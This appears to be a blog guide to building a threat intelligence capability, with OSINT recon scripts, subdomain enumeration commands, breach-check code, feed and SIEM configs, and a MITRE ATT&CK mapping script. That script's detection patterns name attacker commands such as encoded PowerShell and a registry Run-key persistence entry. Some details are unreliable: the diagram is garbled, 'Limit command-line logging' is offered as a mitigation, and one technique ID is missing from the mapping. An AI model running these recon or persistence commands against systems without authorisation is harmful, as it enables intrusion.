Introduction
Threat intelligence transforms security from reactive to proactive. Organizations with mature threat intelligence programs detect threats 65% faster and reduce breach costs by 50%. This guide covers building a threat intelligence capability from scratch.
Key Statistics:
- 68% of breaches involve external actors
- Average dwell time: 197 days (detection)
- Threat intelligence reduces false positives by 45%
- 80% of successful attacks exploit known vulnerabilities
Threat Intelligence Lifecycle
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Threat Intelligence Lifecycle โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ โ
โ โโโโโโโโโโโ โโโโโโโโโโโ โโโโโโโโโโโ โโโโโโโโโโโ โ
โ โ Plan โโโโโถโ Collect โโโโโถโ Process โโโโโถโ Analyze โ โ
โ โโโโโโโโโโโ โโโโโโโโโโโ โโโโโโโโโโโ โโโโโโโโโโโ โ
โ โฒ โ โ
โ โ โผ โ
โ โ โโโโโโโโโโโ โโโโโโโโโโโ โ โ
โ โโโโโโโโโโโโโโโโ Share โโโโโโ Dissem โโโโโโ โ
โ โโโโโโโโโโโ โโโโโโโโโโโ โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
OSINT Techniques
Domain Reconnaissance
#!/usr/bin/env python3
"""OSINT domain reconnaissance."""
import socket
import whois
import requests
from datetime import datetime
from bs4 import BeautifulSoup
def analyze_domain(domain):
"""Comprehensive domain analysis."""
results = {
'domain': domain,
'timestamp': datetime.now().isoformat(),
'whois': {},
'dns': {},
'web_technologies': [],
'subdomains': []
}
# WHOIS lookup
try:
w = whois.whois(domain)
results['whois'] = {
'registrar': w.registrar,
'creation_date': str(w.creation_date),
'expiration_date': str(w.expiration_date),
'name_servers': w.name_servers,
'registrant': {
'name': w.name,
'country': w.country
}
}
except Exception as e:
results['whois']['error'] = str(e)
# DNS records
try:
results['dns']['a'] = socket.gethostbyname(domain)
except:
pass
try:
results['dns']['mx'] = socket.gethostbyname_ex(f'mail.{domain}')
except:
pass
# Technology detection
try:
response = requests.get(f'https://{domain}', timeout=10)
server = response.headers.get('Server', 'Unknown')
results['web_technologies'].append(f'Server: {server}')
# Check for common technologies
html = response.text
if 'wp-content' in html:
results['web_technologies'].append('WordPress')
if 'react' in html.lower():
results['web_technologies'].append('React')
if 'vue' in html.lower():
results['web_technologies'].append('Vue.js')
except Exception as e:
results['web_technologies'].append(f'Error: {str(e)}')
return results
if __name__ == '__main__':
import json
result = analyze_domain('example.com')
print(json.dumps(result, indent=2))
Subdomain Enumeration
# Using amass
amass enum -d example.com -o subdomains.txt
# Using assetfinder
assetfinder --subs-only example.com > subdomains.txt
# Using findomain
findomain -t example.com -o subdomains.txt
# Combining results
cat subdomains.txt | sort -u > combined_subdomains.txt
Breach Data Search
#!/usr/bin/env python3
"""Check for compromised credentials."""
import requests
import json
def check_breach(email):
"""Check if email appears in known breaches."""
# Using Have I Been Pwned API
url = f"https://haveibeenpwned.com/api/v3/breachedaccount/{email}"
headers = {
'User-Agent': 'ThreatIntelTool/1.0'
}
try:
response = requests.get(url, headers=headers, timeout=10)
if response.status_code == 200:
breaches = response.json()
return {
'email': email,
'breached': True,
'breach_count': len(breaches),
'breaches': [b['Name'] for b in breaches]
}
elif response.status_code == 404:
return {'email': email, 'breached': False}
else:
return {'error': f'Status {response.status_code}'}
except Exception as e:
return {'error': str(e)}
def check_password_compromised(password_hash):
"""Check if password hash is compromised."""
# k-Anonymity model
prefix = password_hash[:5]
suffix = password_hash[5:]
url = f"https://api.pwnedpasswords.com/range/{prefix}"
response = requests.get(url)
hashes = response.text.split('\n')
for h in hashes:
hash_suffix, count = h.split(':')
if hash_suffix.lower() == suffix.lower():
return {'compromised': True, 'count': int(count)}
return {'compromised': False}
Threat Feeds Integration
Open Source Feeds
# Threat Intelligence Platform Configuration
threat_intel:
sources:
# AlienVault OTX
alienvault:
enabled: true
api_key: ${ALIENVAULT_API_KEY}
pulse_types:
- malware
- vulnerability
- threat
# Abuse.ch Feeds
abusech:
enabled: true
feeds:
- url: "https://urlhaus.abuse.ch/downloads/json/"
type: malware_urls
- url: "https://feodotracker.abuse.ch/downloads/ipblocklist.json"
type: c2_indicators
- url: "https://spamhaus.org/drop/asn.txt"
type: asn_blocklist
# OTX AlienVault
otx:
enabled: true
api_key: ${OTX_API_KEY}
# ThreatFox
threatfox:
enabled: true
url: "https://threatfox.abuse.ch/downloads/json/"
MISP Integration
# MISP (Malware Information Sharing Platform)
misp:
url: "https://misp.example.com"
api_key: ${MISP_API_KEY}
# Auto-import indicators
auto_import:
enabled: true
tags:
- "tlp:amber"
- "osint:verified"
types:
- domain
- ip
- url
- malware
filters:
malware_category: "banker"
# Export for SIEM
export:
format: "stix"
schedule: "hourly"
MITRE ATT&CK Framework
Coverage Mapping
#!/usr/bin/env python3
"""Map security events to MITRE ATT&CK framework."""
MITRE_TACTICS = {
'TA0001': 'Initial Access',
'TA0002': 'Execution',
'TA0003': 'Persistence',
'TA0004': 'Privilege Escalation',
'TA0005': 'Defense Evasion',
'TA0006': 'Credential Access',
'TA0007': 'Discovery',
'TA0008': 'Lateral Movement',
'TA0009': 'Collection',
'TA0011': 'Command and Control',
'TA0010': 'Exfiltration',
'TA0040': 'Impact'
}
MITRE_TECHNIQUES = {
'T1566': {
'name': 'Phishing',
'tactics': ['TA0001'],
'detection': 'Check for suspicious email attachments/links',
'mitigation': 'Email filtering, user training'
},
'T1059': {
'name': 'Command and Scripting Interpreter',
'tactics': ['TA0002'],
'detection': 'Monitor process execution with PowerShell/WMI',
'mitigation': 'Restrict script execution, application whitelisting'
},
'T1547': {
'name': 'Boot or Logon Autostart Execution',
'tactics': ['TA0003'],
'detection': 'Monitor registry keys and startup folders',
'mitigation': 'Restrict write access to startup locations'
},
'T1082': {
'name': 'System Information Discovery',
'tactics': ['TA0007'],
'detection': 'Monitor for systeminfo, hostname commands',
'mitigation': 'Limit command-line logging'
}
}
def map_to_mitre(event_data):
"""Map security event to MITRE ATT&CK technique."""
# Example mapping logic
technique_mappings = {
'powershell.exe -encodedcommand': 'T1059',
'reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run': 'T1547',
'systeminfo': 'T1082',
'whoami': 'T1087',
'net user': 'T1087'
}
detected_techniques = []
for pattern, technique_id in technique_mappings.items():
if pattern.lower() in event_data.get('command', '').lower():
technique = MITRE_TECHNIQUES.get(technique_id, {})
detected_techniques.append({
'technique_id': technique_id,
'name': technique.get('name', 'Unknown'),
'tactics': [MITRE_TACTICS.get(t, t) for t in technique.get('tactics', [])],
'mitigation': technique.get('mitigation', 'N/A')
})
return detected_techniques
SIEM Integration
Splunk Threat Intelligence
# Splunk threat intelligence configuration
threat_intel:
# Local threat intelligence lookup
local_intel:
path: "/opt/splunk/etc/apps/SA-UTimeIntelligenceLookups"
# IOC fields to lookup
ioc_fields:
- src_ip
- dest_ip
- domain
- file_hash
- url
# Automatic correlation
correlations:
- name: "Malware C2 Communication"
search: "sourcetype=proxy action=allow | lookup mal_ip_list ip as dest_ip OUTPUT action"
alert:
threshold: 1
action: notable
- name: "Phishing Domain Access"
search: "sourcetype=proxy url=* | lookup phishing_domains domain OUTPUT verdict"
alert:
threshold: 1
action: email
# Threat Intelligence Dashboard
dashboards:
- name: "Threat Intelligence Overview"
panels:
- "Top 10 Attacker IPs"
- "Malware Family Distribution"
- "Attack Timeline"
- "Coverage by MITRE Tactic"
QRadar Integration
#!/usr/bin/env python3
"""QRadar threat intelligence plugin."""
def process_offense(qradar_event):
"""Process QRadar offense with threat intelligence."""
offense = qradar_event['offense']
# Get related indicators
indicators = {
'source_ip': offense.get('source_ip'),
'destination_ip': offense.get('destination_ip'),
'username': offense.get('username'),
'domain': offense.get('domain')
}
# Lookup in threat feeds
threat_intel = {}
for ioc_type, ioc_value in indicators.items():
if ioc_value:
# Query threat feeds
result = query_threat_feeds(ioc_type, ioc_value)
if result:
threat_intel[ioc_value] = result
# Calculate threat score
threat_score = calculate_threat_score(threat_intel)
# Generate recommendations
recommendations = []
if threat_score > 70:
recommendations.append("Immediate investigation required")
recommendations.append("Block identified IPs/domains")
return {
'offense_id': offense['id'],
'threat_score': threat_score,
'threat_intel': threat_intel,
'recommendations': recommendations
}
Incident Response Integration
Automated IOC Enrichment
# Automated incident response with threat intelligence
incident_response:
automation:
- name: "IOC Enrichment"
trigger:
severity: high
actions:
- lookup_ioc:
indicators:
- source_ip
- dest_ip
- file_hash
- update_incident:
fields:
threat_actors: "${enriched.threat_actors}"
malware_families: "${enriched.malware_families}"
attack_techniques: "${enriched.mitre_techniques}"
- name: "Auto-Block Malicious IPs"
trigger:
condition: "threat_confidence > 90"
actions:
- block_ip:
target: "firewall"
duration: "24h"
- update_blocklist:
source: "threat_intel"
Threat Intelligence Platforms
| Platform | Type | Key Features | Cost |
|---|---|---|---|
| MISP | Open Source | IOC sharing, taxii | Free |
| OpenCTI | Open Source | Knowledge graph, MITRE | Free |
| Anomali | Commercial | ThreatStream, VM | $$$ |
| Recorded Future | Commercial | Real-time intelligence | $$$$ |
| Mandiant | Commercial | Expert-led intelligence | $$$$ |
| CrowdStrike | Commercial | Falcon Intelligence | $$$ |
Comments